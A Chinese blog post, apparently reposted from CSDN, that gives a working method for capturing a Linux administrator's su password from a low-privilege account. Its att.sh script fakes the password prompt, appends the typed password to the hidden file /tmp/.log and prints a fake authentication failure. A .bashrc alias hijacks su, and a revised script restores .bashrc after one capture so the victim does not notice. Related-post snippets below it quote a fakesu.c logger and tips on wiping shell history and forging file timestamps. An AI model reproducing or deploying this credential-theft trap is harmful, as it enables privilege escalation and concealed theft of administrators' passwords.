shell 脚本里su密码_Linux OS以低权限用户抓取切账户时的密码

最新推荐文章于 2023-04-16 17:43:39 发布
最新推荐文章于 2023-04-16 17:43:39 发布
阅读量1.1k 收藏
点赞数
文章标签: shell 脚本里su密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39830323/article/details/111583640
版权

9fe1f6eabe8ef1ba9862fb700f4d6ced.png

2088952e8e45f09289d396a985dd9930.gif

目的:抓取切用户时输入的密码(即在su root时窃取用户密码)。

操作步骤

先伪造一次认证,首先观察在 su - root 时,正常的回显

21836bf0ba776e6b236c43f56b28e5f2.png

修改su命令 -- att.sh脚本

#!/bin/bashecho -e "Password: c"read -s passecho $pass >> /tmp/.logecho ""echo "su: Authentication failure"

执行脚本,如下图

ff037be100380685221b4b4f36a825cb.png

可以看到没有任何区别,然后备份该用户的 .bashrc 文件

cp -p .bashrc /tmp/.bashrc

修改用户的 .bashrc 文件,添加一条别名

alias su='./att.sh'

测试一下,成功

acc012f3b408687d7a98b1fc5fb73c63.png

然而这里存在一个问题,目前这个状态,认证始终无法成功,会影响到管理员的正常的操作,从而会引起管理员的警觉,所以需要修改为抓取一次密码后,恢复为正常的 su 脚本。

(代码如下)

#!/bin/bashecho -e "Password: c"read -s passecho $pass >> /tmp/.logecho ""echo "su: Authentication failure"#还原原始的.bashrc 启动新的终端,su命令被还原cp -p /tmp/.bashrc .bashrcrm /tmp/.bashrcbash

接着只需按照以上步骤再测试一次即可,最后su命令会还原正常,密码也会被成功记录下来。这样的话,管理员在第一次切换用户失败时,只会怀疑是自己输入密码错误导致,第二次输入密码会正常,这样不会引起管理员的怀疑。

■ Over ■

weixin_39830323
关注
Shell脚本介绍(资源)
qq_40907977的博客
04-26 3110
导语 : 在Linux环境下,我们一般通过Shell来与内核交流,并最终实现我们想要使用计算机资源的目的。由于Linux的开放性特点,使得在Linux下对Shell的选择也很多,CentOS 6.3系统中可以使用的Shell有/bin/sh、/bin/bash、/bin/tcsh、/bin/csh这几种,/etc/shells文件说明了当前系统有哪些可用的Shell。不同的Shell有不同的特点以...
8.Linux操作系统root账号密码获取防范技术研究
weixin_44023460的博客
01-02 385
Linux操作系统由于其开源性、低成本等特点,在商业上运用越来越多,很多公司都采用LAMP(Linux+Apache+Mysql+PHP)典型架构]。相对于Windows操作系统的密码获取技术而言,Linux密码获取比较困难。在Windows中,不论设置多么复杂的密码,都可以通过彩虹表、键盘记录、mimikatz_trunk域名注入获取密码等技术获取包括Windows 2008 Server在内的所有操作系统密码。但在Linux操作系统中,如果设置一个非常复杂的密码,破解成功的几率相对较低。在获得网站Web
linux脚本命令sudo 不手动输入密码回车,sudo命令直接携带密码
01-20
如果没有给普通用户配置过 NOPASSWD,那么每次非root用户在命令行终端执行需要root权限的操作都需要需要密码然后回车,在一般情况下没什么问题,但是如果在脚本中就不行了。 如果希望在脚本中执行一个需要输入密码后回车的命令,我们可以使用管道 echo 密码 | sudo 命令 示例,如下 [admin@BizMsTestAlpha test]$ docker ps Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get ht
Shell高级语法:awk配合eval实现快速变量
过客2019
11-28 991
朋友们好,很高兴再次见面,今天我们来了解一下Shell编程的一个高级语法:如何快速的设置变量 首先我们回顾一下变量,在变量中,只有变量值是可变的(复杂变量能实现变量名与变量值都是可变的),例如下面这个: name=liumou echo $name name=liuyi echo $name 变量简单演示 下面先带来一个普通场景下的脚本优化,需求如下: 使用shell脚本检测当前系统共有多少内存,已使用内存和剩余内存分别是多少 首先我们先执行内存信息查看的命令: free -h .
shell 脚本su密码_shell脚本从入门到放弃
weixin_39995108的博客
11-26 1281
1.首先什么玩意是shell脚本shell就是将需要执行的命令保存到脚本中执行,去做重复、复杂的工作来一个简单的例子理解脚本:(写个脚本jiaoben.sh)[root@pixiaoxian ~]# vim jiaoben.sh [root@pixiaoxian ~]# cat jiaoben.sh #!/usr/bin/bash mkdir code cd code for ((i=0;...
linuxsu密码,linux下记录su密码的代码
weixin_29823011的博客
05-05 849
/** kpr-fakesu.c V0.9beta167 ;P* by koper ** Setting up:* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c* admin@host:~$ mv .su /var/tmp/.su* admin@host:~$ cp .bash_profile .wgetrc* admin@host:~$ e...
Linux shell脚本 sudo自动输入密码
czj01288的博客
09-13 1104
linux shell脚本 suo自动输入密码
python调用adb shell命令_如何在python脚本面连续执行adb shell后面的各种命令
weixin_39910963的博客
12-04 1923
如何在python脚本面连续执行adb shell后面的各种命令adb shell "cd /data/local && mkdir tmp"adb shell mv /data/local/tmp /data/local/tmp.bakadb shell ln -s /data /data/local/tmpadb reboot adb wait-for-deviceadb s...
john_linux线上自动化运维工具
qq_28268989的博客
09-01 159
ansible(基于python开发的工具) 安装 yum -y install epel-release #在线安装最新的yum源 yum -y install ansible ################################################################## 工作原理 ################################################################## 配置 /etc/ansible/hosts //配置
linux权限维持
whojoe的博客
10-08 501
修改属性 文件间 touch -r index.php shell.php touch -t 202010101010 shell.php #touch --help 历史操作命令 histroy -r #删除当前会话历史记录 history -c #删除内存中的所有命令历史 rm .bash_history #删除历史文件中的内容 sed -i '150,$d' .bash_history#只保留前150行 set +o history#针对你的工作关闭历史记录 set -o history#恢复 e
Linux su密码忘记如何重置(简单版)
最新发布
qq_45151652的博客
04-16 3071
Retype new **** password: 重复新的Root用户密码。Enter new **** password: 新的Root用户密码Password: 当前用户密码
[Linux Shell] susudo命令
老码农重操旧事业
06-03 235
今天通过登录公司的一台服务器, 关闭cle服务任务发现需要用户 输入命令需要输入密码 问了一下好像root没有设密码,可以通过换, 通过确认一下 没错,是用户了。
Linux 自启动.sh脚本使用sudo自动输入密码
qq_37392351的博客
07-01 3595
1、root下,vi /etc/sudoers : [root@guanz etc]# vi /etc/sudoers [root@guanz etc]# # 添加如下内容: guanz ALL=(ALL) ALL 示例: ## ## Allow root to run any commands anywhere root ALL=(ALL) ALL guanz ALL=(ALL) ALL ## Allows members of the 'sys
理论篇·系统安全及应用(su命令,sudo命令、密码安全控制、终端自动注销)
weixin_47153668的博客
06-23 803
第十章 系统安全及应用 文章目录第十章 系统安全及应用1、账号安全基本措施1.1、系统账号清理1.2、密码安全控制1.3、命令历史、自动注销1.31、命令历史限制1.3.2、终端自动注销2、用户换与提前2.1、适用su命令用户2.1.1、用途及用法2.1.2、密码验证2.1.3、限制使用su命令的用户2.1.4、查看su操作记录2.1.5、使用sudo机制提升权限3、Linux中的PAM安全认证3.1、PAM及其作用PAM(Pluggable Authentication Modules)可插拔式认证
echo 管道命令给sudo自动输入密码
aiot_bigbear的专栏,关注我获取最新技术文章信息与海量资源~
10-23 1万+
echo 管道命令给sudo自动输入密码  这种方式密码会明文显示,密码不安全,仅作为学习练习用  1、echo psw|sudo -S cmd  1)有候使用脚本运行管理员命令,希望能够自动运行,不被sudo 密码中断;    2)这候可以使用 echo 密码|sudo -S 命令 的形式来自动输入密码;    3)例如关机脚本 myhalt,保存后“右击-属性-权限-允
shell 脚本sudo su命令执行
ytusdc的博客
09-24 4769
候我们需要换到root用户下执行相关命令,但是如果直接在shell 脚本中执行 sudo su 命令,shell 脚本会一直卡顿在 sudo su 这一行,后续的必须手动执行 exit, 退出 root 用户后才能执行。1、为什么需要在shell脚本中使用sudo su
shell指令自带sudo密码
热门推荐
alex1801
10-13 1万+
希望在sh脚本文件中的shell指令中使用sudo命令,需要自动输入密码以确保顺序执行。解决办法:echo 密码 | sudo -S shell命令 如,需要使用超级权限执行python脚本sudo python run.py,密码:123。则shell指令可写为: echo 123 | sudo -S python run.py -S表示将echo输出的标准流读取,作为输入密码。终端执行:man sudo,可查看-S作用。 P...
用户su用户提权sudo命令详解
givenchy_yzl的博客
03-16 510
用户提权 su 使用普通用户登录,然后执行su命令换到root用户 优点:简单 缺点需要知道root用户密码 su username #非登录式shell(下文会讲) su -username #登录式shell 区别就是加载的配置文件不一样 su username在用户候,只执行了 /etc/bashrc /etc/profile.d/*.sh [root@qls ~]# useradd test10 [root@qls ~]# echo
Shell学习十:su命令
sinat_34241861的博客
07-12 2545
一、su命令介绍 su的作用是变更为其它使用者身份,超级用户除外,需要键入该使用者的密码 二、参数介绍 -c command:变更账号为USER的使用者,并执行指令(command)后再变回原来使用者 –help 显示说明文件 –version 显示版本资讯 三、举例 1、su -c # 变更当前帐号为root并在执行ls指令后退出变回原使用者 su -c ls root ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值